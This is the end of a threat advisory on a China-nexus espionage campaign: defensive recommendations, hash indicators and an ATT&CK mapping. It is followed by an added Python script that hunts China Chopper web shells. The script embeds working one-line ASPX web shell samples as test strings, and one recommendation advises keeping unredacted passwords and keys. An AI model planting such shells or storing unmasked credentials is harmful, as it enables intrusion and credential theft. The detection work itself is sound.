the\r\noptional ‘cs-bytes’ field to be enabled). \r\nMonitor for unexpected parameter names or values in incoming HTTP requests, including credential-like names\r\n(‘password’, ‘key’, ‘pass’) sent to pages that have no login function. \r\nEnable PowerShell transcript logging (and script block logging) to capture and analyze suspicious activity; both apply to\r\nhosted runspaces as well as to PowerShell.exe. \r\nRecommendations for Defending Against Weaver Ant\r\nMinimize Privileges: Restrict web-service accounts to the least privileges required. 
\r\nControl Management Traffic: Use ACLs and firewall rules to limit management traffic between web servers and\r\ninternal systems, especially for SMB and HTTP/S; a web server rarely has a legitimate reason to open SMB or HTTP\r\nconnections to other internal servers, and that is exactly the path the tunneling and SMB lateral movement above relied on. \r\nEnforce Credential Hygiene: Implement LAPS, gMSA, or a PIM solution to regularly rotate credentials, so that a hash\r\nharvested today cannot be replayed years later. \r\nEnhance Detection: Deploy EDR/XDR solutions to monitor memory for malicious activity, including obfuscated in-memory web shells. \r\nStrengthen Web Security: Tune WAF and logging systems to detect obfuscated code signatures and behavioral\r\npatterns linked to China Chopper and INMemory web shells. Raise the WAF’s request-body logging limit so payloads are\r\nnot truncated, and consider retaining an unmasked copy of parameters the WAF would normally redact (‘password’, ‘key’,\r\n‘pass’) in a restricted store, since both gaps were exploited in this case.\r\nAppendix I: Indicators of Compromise\r\nSHA1 SHA256\r\n207b7cf5db59d70d4789cb91194c732bcd1cfb4b 076364dd23d46c40d00fc62baa9826a4c74900cc0f31605b15d92153b184dd7a\r\n4fa2b2ab3e24ee9d130cfeda63c7ae1ccbc393dc 1ba9bba238cb2818a469630e86631cc1a5f840893dcc463baff5a772e47922a6\r\n4aeeae023766153a91b83d02b1b24da20c0dd135 20156a215ae023123dfd6c5396276aa6575583bb9944bb05586d4c5f9526e2e8\r\n4dd22a08a5b103e1f2238aed7f7ce66c5a542533 24cf92ec8c3262bd8eb9eb381229da082617c97caefe8ac9e6f931d1251f7e40\r\n4dc0ebfa52adf9b9eb4fa8f0a359c21a14e183fb 25f0ed5fca4a823c06d9eb86dc121ba814db31110d94a77bfde775b4b286c5fb\r\nd102a34b3f0efb57f1d9f04eff26b256875a3aa1 307c99257d6049d6a3c53fb928db80d17d99ee83b336fe1d25ea4f8ad61926ac\r\nff7b2c3938306261881c42e78d0df51d9bcdd574 344d8621cdc4c063d8967a7ca82b68ad90477fd24f280287a0236c3dd5d3956b\r\nf31920d636224356e8c7a182c2b9b37e42a09181 3dc91bdd912f07c514ab30382c6ac2204861d44559c86f88b5afd2a9d99d7364\r\n49cd96df4c85cdd7461701340c0bb4d05a5049d8 4610747272f6e968b2edcab1f00b3162ec34787630a1119f32e1ea7d82dc96ab\r\n9dc3d272652851428f5cc44f2fd9458bff1d6a78 4a4d70c3fca0f3ef8643af93e87cd1b78b7d464f78c26f9130980ecd8b2d65c8\r\n151dc47b213aaec3751ffd1427737c65757ab410 
50a045e685ff8df1ec84e2e530e1df4215438f6a0ac79f4d0a29e51fd24d22de\r\n9022f78087e1679035e09160d59d679dc3ac345d 55c8099243bb01be64f1fb0f883e99519acb6adb3c6be8b545159d7554151ba1\r\n0e282dc84d6cfd447fece7d3ecc622523b143aa8 5661e2bf6d9379b6137ea10a2e725d2a18ccf0f704743fd76b15ba48d17fa052\r\nbe52275b0c2086735dac478dc4f09fd16031669a 6598ea73d7e437950b3e8caa21229eec7ebcdf22de413384aa2f212df23ebca3\r\n55eeaa904bc6518a2715cc77648e6c5187416a46 6aae79fe0cda1d7ba3c5c0abccaee8a7b759900c9748fa06d2ec1e004ba3c5ab\r\na5c36b8022751cfeb4a88a21153847df3870c7c0 70f16fb2292e5bae76b5b020a4cea21e58021fabf3d0bbd76ae3fa6e31a9fd81\r\n2b9b740fb5fe0549810500476f567002683df71d 8ed905a73212a18c6d10055f15c917ac9d20f672854b12faa7483d2f4d93841b\r\n02065bbdb3209e0522db3225600b8e79f8a10293 9533e8585b73604fd41b7e015d31f65198784c0da2e6e8f2fe35c0f6d12398af\r\n25a593b9517d6c325598eab46833003c40f9491a b82aea5e61ecb39ffb592e80d22a6b7646c266af2cb28d0743c906ac13dafb51\r\nad3dbec2b621807fa9a2f1b2f575d7077e494626 ca10da18a28963ef375c3d23a49e55bc90777e267d9ebd11541033a1766f44f1\r\nc879a8eb6630b0cd7537b068f4e9af2c9ca08a62 cc6833017fd0d2b7e5df5a9644ead67cc0aa8981e1e6a231bc0416a3bb410069\r\n3cac6ff7cddcb8f82409c79c85d976300fc60861 d6f3fc16862345627e61d15534044800a5fd68ebc9a539d8f63cb40a8b0238c0\r\n23c4049121a9649682b3b901eaac0cc52c308756 daab9b2deeea41cb1f7849fbc46a40168c542df098abb615d1aa8e34548684de\r\n334a88e288ae18c6e3fd7fb2d1ad9548497d52ce dd2964927ae0f8c78175921523e630d9b36f48b57028f6d57726c4b8d9109fa8\r\na9bbea73504139ce91a0ec20fef303c68a131cd4 dee501523816cfac7ac4e53fb18d9e902f3ec17916491c5864f9fc4f39419897\r\n495a4b4757f3b1eec7fdaa9d0b2930071565f2b1 df50d1016c9f6952f0efc1646f4203bb71e6d851d761698f56a802be6b357f71\r\n492cbe143f795888d8e5006ac595f65f4565ed6e eec128dc9d1f4677fc462f6ec74a432169373926a827358a73c0f0961595adb6\r\n81622512757f897206a84b29ee866fb933fa3d48 
eee9dd8363492ceb7449c0c00f0d5deed9e79b745920b34f051b5dd7f1f9959d\r\n089439168d3c75b4da94ab801f1c46ad6b9e1fdc\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 9 of 10\n\nAppendix II: MITRE ATT\u0026CK Matrix Mapping\r\n1. Initial Access \r\n1. T1190- Exploit Public-Facing Application \r\n2. Execution\r\n1. T1059.001 - Command and Scripting Interpreter: PowerShell \r\n2. T1059.003 - Command and Scripting Interpreter: Windows Command Shell \r\n3. T1059.005 - Command and Scripting Interpreter: Visual Basic \r\n4. T1059.007 - Command and Scripting Interpreter: JavaScript \r\n3. Persistence\r\n1. T1078.002 - Valid Accounts: Domain Accounts \r\n2. T1078.003 - Valid Accounts: Local Accounts \r\n3. T1505.003 - Server Software Component: Web Shell \r\n4. Privilege Escalation \r\n1. T1078.002 - Valid Accounts: Domain Accounts \r\n2. T1134.001 - Access Token Manipulation: Token Impersonation/Theft \r\n5. Defense Evasion\r\n1. T1055 - Process Injection \r\n2. T1134.001 - Access Token Manipulation: Token Impersonation/Theft \r\n6. Credential Access \r\n1. T1552.001- Unsecured Credentials: Credentials In Files \r\n2. T1003.002 - OS Credential Dumping: Security Account Manager \r\n7. Discovery \r\n1. T1087.002 - Account Discovery: Domain Account \r\n2. T1083 - File and Directory Discovery \r\n3. T1135 - Network Share Discovery \r\n4. T1018 - Remote System Discovery \r\n5. T1082 - System Information Discovery \r\n6. T1016 - System Network Configuration Discovery \r\n8. Lateral Movement \r\n1. T1021.001 - Remote Services: SMB/Windows Admin Shares \r\n2. T1570 - Lateral Tool Transfer \r\n9. Collection \r\n1. T1560.001 - Archive Collected Data: Archive via Utility \r\n2. T1074.001 - Data Staged: Local Data Staging \r\n10. Command and Control  \r\n3. T1071.001 - Application Layer Protocol: Web Protocols \r\n4. T1572 - Protocol Tunneling \r\n5. T1090.001 - Proxy: Internal Proxy \r\n11. Exfiltration\r\n1. 
T1048 - Exfiltration Over Alternative Protocol\r\nIf you were impacted by this attack or are seeking guidance on how to prevent similar attacks, please contact us at\r\ncontact@sygnia.co or our 24-hour hotline +1-877-686-8680.\r\nThis advisory and any information or recommendation contained herein has been prepared for general informational\r\npurposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to\r\nany entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources\r\nand to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is\r\nnot responsible for any errors or omissions, or for the results obtained from the use of this Advisory. This Advisory is\r\nprovided on an as-is basis, and without warranties of any kind. \r\nSource: https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/"
	],
	"report_names": [
		"weaver-ant-tracking-a-china-nexus-cyber-espionage-operation"
	],
	"threat_actors": [
		{
			"id": "50b43f44-b93c-4377-82bc-d6e9c7ef5ee6",
			"created_at": "2022-10-25T16:07:23.573424Z",
			"updated_at": "2026-04-10T02:00:04.673762Z",
			"deleted_at": null,
			"main_name": "Elephant Beetle",
			"aliases": [
				"TG2003"
			],
			"source_name": "ETDA:Elephant Beetle",
			"tools": [
				"JSPSPY",
				"MiniWebCmdShell",
				"jsp File browser",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7aa1288a-61ec-4793-b543-9fedc26b9b03",
			"created_at": "2023-11-01T02:01:06.805323Z",
			"updated_at": "2026-04-10T02:00:05.331884Z",
			"deleted_at": null,
			"main_name": "FIN13",
			"aliases": [
				"FIN13",
				"Elephant Beetle"
			],
			"source_name": "MITRE:FIN13",
			"tools": [
				"Impacket",
				"Mimikatz",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f57e32ac-9f90-471d-93ba-7f6d8b05e6c1",
			"created_at": "2023-01-06T13:46:39.29882Z",
			"updated_at": "2026-04-10T02:00:03.279184Z",
			"deleted_at": null,
			"main_name": "FIN13",
			"aliases": [
				"TG2003",
				"Elephant Beetle"
			],
			"source_name": "MISPGALAXY:FIN13",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434228,
	"ts_updated_at": 1775791858,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.pdf",
		"text": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.txt",
		"img": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.jpg"
	}
}
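The advisory's closing recommendations (tune WAF and logging for China Chopper signatures and for the behavioural patterns of web shell traffic) can be turned into a concrete hunt. The script below is an added example written for this page; it is not Sygnia's tooling and nothing in it was recovered from the Weaver Ant intrusion. It does two things: a content pass that matches the public one-line China Chopper forms and a generic "base64 decode feeding dynamic execution" loader pattern over files from a web root, and a behavioural pass over IIS W3C logs that flags clients which only ever POST to a script endpoint and never send a Referer, the shape a web shell operator produces and a browser session does not. The IIS log lines, the shell and benign page samples, and the path /aspnet_client/system_web/default.aspx are all constructed for illustration. Two caveats: IIS logs do not record the POST body, which is where China Chopper's `eval` payload lives, so the log pass has to rely on behaviour and a WAF with request-body inspection is the complement; and an in-memory web shell like the INMemory shell the report describes leaves no file for the content pass, which is why the advisory also asks for memory monitoring by EDR/XDR.

```python
"""Hunt for China Chopper-style web shell activity (added example; all sample
inputs below are constructed, not taken from the Weaver Ant investigation)."""
import re
from collections import defaultdict

# --- Part 1: content signatures for files pulled from a web root -----------
# China Chopper's ASPX form is a single eval of a request parameter:
#   <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
CHOPPER_ASPX = re.compile(
    r'eval\s*\(\s*Request\.Item\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.I)
# PHP form: <?php @eval($_POST['pw']); ?>
CHOPPER_PHP = re.compile(r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[', re.I)
# Obfuscated loaders: a base64 decode and a dynamic-execution primitive in the same file.
B64_DECODE = re.compile(r'FromBase64String|base64_decode', re.I)
DYNAMIC_EXEC = re.compile(r'\beval\b|\bAssembly\.Load\b|\bExecute(?:Global)?\b', re.I)


def scan_source(text: str) -> list:
    """Return the names of web shell signatures matching a file's contents."""
    hits = []
    if CHOPPER_ASPX.search(text):
        hits.append("china_chopper_aspx")
    if CHOPPER_PHP.search(text):
        hits.append("china_chopper_php")
    if B64_DECODE.search(text) and DYNAMIC_EXEC.search(text):
        hits.append("base64_dynamic_exec")
    return hits


# --- Part 2: behavioural pass over IIS W3C extended logs -------------------
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".php", ".jsp")


def parse_iis(lines) -> list:
    """Parse IIS W3C log lines, taking column names from the #Fields: header."""
    fields, records = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated row: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def hunt_post_only_clients(records, min_posts: int = 3) -> list:
    """Flag (client, script path) pairs that interact by POST only and never send
    a Referer. A browser GETs pages and carries a Referer; a web shell client
    posts commands straight to the script it planted and does neither."""
    stats = defaultdict(lambda: {"post": 0, "get": 0, "referer": 0, "agents": set()})
    for r in records:
        path = r.get("cs-uri-stem", "").lower()
        if not path.endswith(SCRIPT_EXTS):
            continue
        s = stats[(r.get("c-ip"), path)]
        method = r.get("cs-method", "").upper()
        if method == "POST":
            s["post"] += 1
        elif method == "GET":
            s["get"] += 1
        if r.get("cs(Referer)", "-") != "-":
            s["referer"] += 1
        s["agents"].add(r.get("cs(User-Agent)"))
    findings = []
    for (client, path), s in stats.items():
        if s["post"] >= min_posts and s["get"] == 0 and s["referer"] == 0:
            findings.append({"client": client, "path": path, "posts": s["post"],
                             "user_agents": sorted(a for a in s["agents"] if a)})
    return findings


# --- Constructed samples (hypothetical hosts, paths and timestamps) ---------
CHOPPER_SAMPLE = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
OBFUSCATED_SAMPLE = ('<% var p = System.Text.Encoding.UTF8.GetString('
                     'System.Convert.FromBase64String(Request["d"])); eval(p, "unsafe"); %>')
BENIGN_SAMPLE = '<%@ Page Language="C#" %><html><body><asp:Label runat="server" Text="Hello" /></body></html>'
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-03-01 08:00:01 10.10.1.20 GET /index.aspx - 443 - 10.10.5.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 31
2025-03-01 08:00:03 10.10.1.20 POST /login.aspx - 443 - 10.10.5.7 Mozilla/5.0+(Windows+NT+10.0) https://portal.example/index.aspx 302 0 0 45
2025-03-01 08:00:04 10.10.1.20 GET /account.aspx - 443 user1 10.10.5.7 Mozilla/5.0+(Windows+NT+10.0) https://portal.example/login.aspx 200 0 0 28
2025-03-01 08:12:10 10.10.1.20 POST /aspnet_client/system_web/default.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible;+MSIE+9.0) - 200 0 0 12
2025-03-01 08:12:41 10.10.1.20 POST /aspnet_client/system_web/default.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible;+MSIE+9.0) - 200 0 0 10
2025-03-01 08:13:07 10.10.1.20 POST /aspnet_client/system_web/default.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible;+MSIE+9.0) - 200 0 0 9
2025-03-01 08:13:30 10.10.1.20 POST /aspnet_client/system_web/default.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible;+MSIE+9.0) - 200 0 0 11
"""

if __name__ == "__main__":
    for name, src in [("chopper", CHOPPER_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE),
                      ("benign", BENIGN_SAMPLE)]:
        print(f"{name}: {scan_source(src)}")
    for f in hunt_post_only_clients(parse_iis(SAMPLE_LOG.splitlines())):
        print(f"POST-only client {f['client']} -> {f['path']} ({f['posts']} posts, UA {f['user_agents']})")
```

In a real hunt the content pass runs over every file under the web roots (including directories like aspnet_client that are not meant to hold application code), and the log pass is fed the full IIS log set rather than a single day; raise min_posts and add a time window if a busy API produces legitimate POST-only clients, and treat a hit on a path that the application does not ship as the stronger signal.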